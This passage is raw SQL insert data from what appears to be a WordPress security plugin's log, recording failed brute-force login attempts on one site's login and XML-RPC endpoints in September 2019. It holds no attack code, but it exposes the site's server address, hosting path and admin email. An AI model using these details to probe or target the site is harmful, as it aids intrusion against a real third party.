06:16:09',17739568,19230272,'https://bintara.com.my/wp-login.php',1,0,'34.76.36.242'),(23819,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"118.70.239.146\";s:11:\"REMOTE_PORT\";s:5:\"35284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3UjWCCaIOMm5l5jJEQyQAAARc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568527501.9306\";s:12:\"REQUEST_TIME\";s:10:\"1568527501\";}}','notice','2019-09-15 06:05:04','2019-09-15 06:05:02',18257688,19555480,'https://bintara.com.my/xmlrpc.php',1,0,'118.70.239.146'),(23818,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"118.70.239.146\";s:11:\"REMOTE_PORT\";s:5:\"34800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3UieesTgPVjZVPWmsGmAAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568527497.6002\";s:12:\"REQUEST_TIME\";s:10:\"1568527497\";}}','notice','2019-09-15 06:04:58','2019-09-15 06:04:57',17739856,19230696,'https://bintara.com.my/wp-login.php',1,0,'118.70.239.146'),(23817,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"58496\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3R1mCCaIOMm5l5jJEQlwAAAQw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568526806.2603\";s:12:\"REQUEST_TIME\";s:10:\"1568526806\";}}','notice','2019-09-15 05:53:27','2019-09-15 05:53:26',18255784,19554144,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(23816,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"58257\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3R06PPIU0WjPk-sOt8KgAAAYU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568526803.4183\";s:12:\"REQUEST_TIME\";s:10:\"1568526803\";}}','notice','2019-09-15 05:53:24','2019-09-15 05:53:23',17739416,19230208,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(23815,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"46532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3PE6PPIU0WjPk-sOt6QwAAAYo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568526099.3134\";s:12:\"REQUEST_TIME\";s:10:\"1568526099\";}}','notice','2019-09-15 05:41:40','2019-09-15 05:41:39',18257544,19554792,'https://bintara.com.my/xmlrpc.php',1,0,'34.76.36.242'),(23814,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"46008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3PEGCCaIOMm5l5jJEQPAAAARY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568526096.1738\";s:12:\"REQUEST_TIME\";s:10:\"1568526096\";}}','notice','2019-09-15 05:41:37','2019-09-15 05:41:36',17739448,19230400,'https://bintara.com.my/wp-login.php',1,0,'34.76.36.242'),(23813,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"45880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3MgcI4rLk@YW2Med@OFgAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568525441.6083\";s:12:\"REQUEST_TIME\";s:10:\"1568525441\";}}','notice','2019-09-15 05:30:43','2019-09-15 05:30:42',18258680,19553512,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(23812,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"45432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3MfpWXnyAWscVq703ptQAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568525438.6629\";s:12:\"REQUEST_TIME\";s:10:\"1568525438\";}}','notice','2019-09-15 05:30:40','2019-09-15 05:30:39',17738376,19229512,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(23811,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"45418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3Ju1NglnLNtPb4WmyBpAAAAUE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568524731.5093\";s:12:\"REQUEST_TIME\";s:10:\"1568524731\";}}','notice','2019-09-15 05:18:52','2019-09-15 